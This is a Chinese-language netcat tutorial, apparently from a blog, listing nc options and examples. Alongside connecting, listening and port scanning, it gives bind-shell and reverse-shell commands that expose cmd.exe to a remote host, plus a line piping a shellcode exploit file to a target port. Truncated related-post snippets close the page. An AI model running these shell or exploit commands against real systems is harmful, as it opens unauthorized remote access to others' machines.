-d 後台模式
-e prog 程式重定向,一旦連線,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-g num source-routing pointer: 4, 8, 12, …
-h 幫助資訊
-i secs 延時的間隔
-l 監聽模式,用於入站連線
-l 連線關閉後,仍然繼續監聽
-n 指定數字的ip位址,不能用hostname
-o file 記錄16進製制的傳輸
-p port 本地埠號
-r 隨機本地及遠端埠
-s addr 本地源位址
-t 使用telnet互動方式
-u udp模式
-v 詳細輸出–用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉–用於掃瞄時
埠的表示方法可寫為m-n的範圍格式。
基本用法:
大概有以下幾種用法:
1)連線到remote主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的tcp80埠
2)監聽local主機,例子:
格式:nc -l -p 80
講解:監聽本機的tcp80埠
3)掃瞄遠端主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃瞄192.168.x.x的tcp80到tcp445的所有埠
4)remote主機繫結shell,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
講解:繫結remote主機的cmdshell在remote主機的tcp5354埠
5)remote主機繫結shell並反向連線,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
講解:繫結remote主機的cmdshell並反向連線到192.168.x.x的tcp5354埠
以上為最基本的幾種用法(其實nc的用法還有很多,
當配合管道命令「|」與重定向命令「<」、「>」等等命令功能更強大…)。
高階用法:
6)作攻擊程式用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
講解:連線到192.168.x.x的80埠,並在其管道中傳送c:exploit.txt的內容(兩種格式確有相同的效果,真是有異曲同工之妙:p)
附:c:exploit.txt為shellcode等
7)作蜜罐用[1],例子:
格式:nc -l -p 80
講解:使用-l(注意l是大寫)可以不停地監聽某乙個埠,直到ctrl+c為止.
8)作蜜罐用[2],例子:
格式:nc -l -p 80 > c:log.txt
講解:使用-l可以不停地監聽某乙個埠,直到ctrl+c為止,同時把結果輸出到c:log.txt中,如果把『>』改為『>>』即可以追加日誌。
附:c:log.txt為日誌等
9)作蜜罐用[3],例子:
格式1:nc -l -p 80 < c:honeypot.txt
格式2:type.exe c:honeypot.txt|nc -l -p 80
講解:使用-l可以不停地監聽某乙個埠,直到ctrl+c為止,並把c:honeypot.txt的內容『送』入其管道中。
瑞士軍刀 NC用法
瑞士軍刀 nc.exe 引數說明 h 檢視幫助資訊 d 後台模式 e prog程式重定向,一但連線就執行 危險 i secs延時的間隔 l 監聽模式,用於入站連線 l 監聽模式,連線天閉後仍然繼續監聽,直到ctr c n ip位址,不能用網域名稱 o film記錄16進製制的傳輸 p 空格 埠 本地...
NC瑞士軍刀的具體使用方法
nc的使用方法 netcat被譽為網路安全界的 瑞士軍刀 相信沒有什麼人不認識它吧.乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路...
NC瑞士軍刀的具體使用方法
netcat被譽為網路安全界的 瑞士軍刀 相信沒有什麼人不認識它吧.乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路連線,還有幾個很...